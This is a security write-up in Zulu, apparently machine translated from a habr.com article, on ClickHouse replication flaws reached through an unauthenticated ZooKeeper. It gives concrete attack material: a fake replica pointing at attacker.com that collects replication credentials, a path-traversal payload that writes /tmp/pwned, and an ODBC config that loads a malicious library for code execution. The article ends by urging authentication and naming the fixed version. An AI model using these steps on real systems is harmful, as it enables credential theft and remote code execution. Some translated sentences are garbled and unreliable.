Lesi sihloko sizoxoxa indaba yokuba sengozini okucacile kuphrothokholi yokuphindaphinda ye-ClickHouse, futhi sizobonisa ukuthi indawo yokuhlasela inganwetshwa kanjani.
I-ClickHouse iyisizindalwazi sokugcina idatha enkulu, evamise ukusebenzisa ikhophi engaphezu kweyodwa. Ukuhlanganisa nokuphindaphinda ku-ClickHouse kwakhiwe phezulu (ZK) futhi zidinga amalungelo okubhala.
Ukufakwa okuzenzakalelayo kwe-ZK akudingi ukuqinisekiswa, ngakho izinkulungwane zamaseva e-ZK asetshenziselwa ukulungisa i-Kafka, i-Hadoop, i-ClickHouse zitholakala esidlangalaleni.
Ukuze unciphise indawo yakho yokuhlasela, kufanele uhlale ulungisa ukuqinisekiswa nokugunyazwa lapho ufaka i-ZooKeeper
Yebo kukhona ukuchithwa kwe-Java okusekelwe ku-0day, kodwa cabanga ukuthi umhlaseli angafunda futhi abhalele i-ZooKeeper, esetshenziselwa ukuphindaphinda kwe-ClickHouse.
Uma ilungiselelwe kumodi yeqoqo, i-ClickHouse isekela imibuzo esabalalisiwe , edlula ku-ZK - kubo ama-node adalwe eshidini /clickhouse/task_queue/ddl.
Isibonelo, udala i-node /clickhouse/task_queue/ddl/query-0001 ngokuqukethwe:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']futhi ngemva kwalokho, ithebula lokuhlola lizosuswa kumaseva eqoqo elithi host1 kanye ne-host2. I-DDL futhi isekela ukusebenzisa imibuzo ethi CREATE/ALTER/DROP.
Umsindo uyethusa? Kodwa umhlaseli angawatholaphi amakheli eseva?
isebenza ezingeni lamathebula ngamanye, ukuze kuthi lapho ithebula lenziwa ku-ZK, kucaciswe iseva ezoba nesibopho sokushintshana imethadatha ngezifanekiso. Isibonelo, lapho wenza isicelo (i-ZK kumele imiswe, chXX - igama le-replica, u-foobar - igama lethebula):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;amanodi azokwakhiwa amakholomu ΠΈ Imethadatha.
Okuqukethwe /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpIngabe kungenzeka ukuhlanganisa idatha esuka kuleli qoqo? Yebo, uma imbobo yokuphindaphinda (TCP/9009) kuseva chXX-address i-firewall ngeke ivalwe futhi ukuqinisekiswa kokuphindaphinda ngeke kulungiselelwe. Ungabudlula kanjani ubuqiniso?
Umhlaseli angakha ikhophi entsha ku-ZK ngokumane akopishe okuqukethwe kuyo /clickhouse/tables/01-01/foobar/replicas/chXX nokuguqula incazelo host.
Okuqukethwe /clickhouse/tables/01β01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpKhona-ke udinga ukutshela ezinye izifaniso ukuthi kukhona ibhulokhi entsha yedatha kuseva yomhlaseli okudingeka bayithathe - i-node yenziwa ku-ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (Ikhawunta ye-XX ekhula kancane, okufanele ibe nkulu kuneyokugcina kulogi yomcimbi):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2kuphi umthombo_isithombe - igama lesifaniso somhlaseli esidalwe esinyathelweni sangaphambilini, block_id - isihlonzi se-data block, uthole - "thola i-block" umyalo (futhi ).
Okulandelayo, ikhophi ngayinye ifunda umcimbi omusha kulogi bese iya kuseva elawulwa umhlaseli ukuze ithole ibhulokhi yedatha (iphrothokholi yokuphindaphinda ingamambambili, isebenza phezu kwe-HTTP). Iseva attacker.com uzothola izicelo:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXlapho i-XXX iyidatha yokuqinisekisa yokuphindaphinda. Kwezinye izimo, lokhu kungase kube i-akhawunti enokufinyelela kusizindalwazi ngephrothokholi eyinhloko ye-ClickHouse kanye nephrothokholi ye-HTTP. Njengoba ubonile, indawo yokuhlasela iba nkulu kakhulu ngoba i-ZooKeeper, esetshenziselwa ukuphindaphinda, ishiywe ngaphandle kokuqinisekisa okulungiselelwe.
Ake sibheke umsebenzi wokuthola ibhulokhi yedatha ku-replica, kubhalwe ngokuqiniseka okugcwele ukuthi zonke izifaniso zingaphansi kokulawulwa okufanele futhi kukhona ukwethembana phakathi kwazo.
ikhodi yokucubungula ukuphindaphinda
Umsebenzi ufunda uhlu lwamafayela, amagama awo, osayizi, okuqukethwe, bese uwabhala ohlelweni lwamafayela. Kuyafaneleka ukuchaza ngokwehlukana ukuthi idatha igcinwa kanjani ohlelweni lwefayela.
Kunemibhalo engaphansi eminingana ku /var/lib/clickhouse (uhlu oluzenzakalelayo lokugcina olusuka kufayela lokumisa):
amafulegi - umkhombandlela wokuqopha , isetshenziswe ekubuyiseleni ngemva kokulahlekelwa idatha;
tmp - umkhombandlela wokugcina amafayela esikhashana;
umsebenzisi_amafayela - ukusebenza okunamafayela ezicelweni kukhawulelwe kulolu hlu lwemibhalo (INTO OUTFILE nabanye);
Imethadatha - amafayela we-sql anezincazelo zetafula;
okucutshungulwe ngaphambili_okulungiselelwe - Amafayela okucushwa acutshunguliwe asuka ku- /etc/clickhouse-server;
idatha - uhla lwemibhalo lwangempela olunedatha ngokwayo, kulokhu kusizindalwazi ngasinye uhla lwemibhalo olungaphansi oluhlukile luyakhiwa lapha (isibonelo /var/lib/clickhouse/data/default).
Kuthebula ngalinye, uhla lwemibhalo olungaphansi luyakhiwa ohlwini lwemibhalo. Ikholomu ngayinye iyifayela elihlukile kuye ngokuthi . Isibonelo setafula u-foobaradalwe umhlaseli, amafayela alandelayo azodalwa:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2I-replica ilindele ukwamukela amafayela anamagama afanayo lapho icubungula ibhulokhi yedatha futhi ayiwaqinisekisi nganoma iyiphi indlela.
Umfundi oqaphile cishe usezwile kakade mayelana nokuhlanganisa okungaphephile kwegama_legama emsebenzini WriteBufferFromFile. Yebo, lokhu kuvumela umhlaseli ukuthi abhale okuqukethwe ngokunganaki kunoma yiliphi ifayela ku-FS elinamalungelo omsebenzisi clickhouse. Ukwenza lokhu, umfanekiso olawulwa umhlaseli kufanele ubuyisele impendulo elandelayo esicelweni (izinqamuli zomugqa zengeziwe ukuze kube lula ukuqonda):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperfuthi ngemva kokuhlangana ../../../../../../../../../tmp/pwned ifayela lizobhalwa /tmp/pwned ngokuqukethwe hellofromzookeeper.
Kunezinketho ezimbalwa zokuguqula amandla okubhala ifayela abe yi-remote code execution (RCE).
Izichazamazwi zangaphandle nge-RCE
Ezinguqulweni ezindala, inkomba enezilungiselelo ze-ClickHouse yayigcinwe ngamalungelo omsebenzisi clickhouse okuzenzakalelayo. Amafayela ezilungiselelo angamafayela e-XML afundwa isevisi ekuqaleni bese egcina inqolobane /var/lib/clickhouse/preprocessed_configs. Uma izinguquko zenzeka, ziphinda zifundwe. Uma ukwazi ukufinyelela /etc/clickhouse-server umhlaseli angadala owakhe uhlobo olusebenzisekayo bese ukhipha ikhodi engafanele. Izinguqulo zamanje ze-ClickHouse azinikezi amalungelo ngokuzenzakalelayo, kodwa uma iseva ibuyekezwa kancane kancane, amalungelo anjalo angahlala. Uma usekela iqoqo le-ClickHouse, hlola amalungelo kuhla lwemibhalo yezilungiselelo, kufanele kube elomsebenzisi root.
ODBC kuya ku-RCE
Lapho ufaka iphakheji, umsebenzisi uyadalwa clickhouse, kodwa uhla lwayo lwasekhaya alwakhiwe /nonexistent. Nokho, lapho usebenzisa izichazamazwi zangaphandle, noma ngezinye izizathu, abalawuli bakha inkomba /nonexistent futhi unikeze umsebenzisi clickhouse ukufinyelela kokuyibhalela (SSZB! cishe. umhumushi).
I-ClickHouse isekela futhi ingaxhuma kwezinye izingosi zolwazi. Ku-ODBC, ungacacisa indlela eya kulabhulali yomshayeli wesizindalwazi (.so). Izinguqulo ezindala ze-ClickHouse zikuvumele ukuthi wenze lokhu ngokuqondile kusiphathi sesicelo, kodwa manje ukuhlola okuqinile kochungechunge lokuxhuma sekungeziwe odbc-bridge, ngakho-ke akusakwazeki ukucacisa indlela yomshayeli esicelweni. Kodwa ingabe umhlaseli angabhalela uhla lwemibhalo lwasekhaya esebenzisa ukuba sengozini okuchazwe ngenhla?
Masidale ifayela ~/.odbc.ini ngokuqukethwe okufana nalokhu:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.sobese kuthi ekuqaleni SELECT * FROM odbc('DSN=lalala', 'test', 'test'); umtapo wolwazi uzolayishwa test.so futhi yathola i-RCE (ngiyabonga okwethiphu).
Lokhu kanye nobunye ubungozi bulungisiwe enguqulweni ye-ClickHouse engu-19.14.3. Nakekela i-ClickHouse yakho kanye ne-ZooKeepers!
Source: www.habr.com